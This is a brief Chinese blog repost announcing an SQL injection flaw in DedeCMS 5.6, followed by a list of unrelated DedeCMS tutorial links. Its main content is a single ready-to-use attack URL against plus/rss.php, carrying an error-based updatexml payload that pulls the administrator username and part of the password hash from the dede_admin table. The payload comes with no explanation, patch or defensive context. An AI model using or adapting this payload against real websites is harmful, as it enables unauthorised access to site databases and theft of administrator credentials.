dedecms 5.6的最新注入漏洞

本文整理自网络，侵删。

　　最新dedecms 5.6的注入代码：

　　http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1

标签：织梦DedeCMS

相关阅读 >>

织梦（dedecms v5.7 ）添加自定义属性的实现方法(图文详解)

完美解决dedecms中的[html][html]和[code][code]问题

火车头dedecms5.6文章免登陆发布接口

dedecms教程之loop循环标签的使用详解

dedecms后台：fatal errorcall to a member function read()

dedecms如何为文章添加hot new标志图片

dede热门tag,dede首页digg,dede随机热门关键字调用方法

织梦(dede)模板标签书写格式的规范和相关注意事项

织梦模板正则批量替换文章内容内链变成绝对路径的方法

linux和windows主机实现dedecms伪静态

更多相关阅读请进入《织梦DedeCMS》频道 >>

转载请注明出处：木庄网络博客 » dedecms 5.6的最新注入漏洞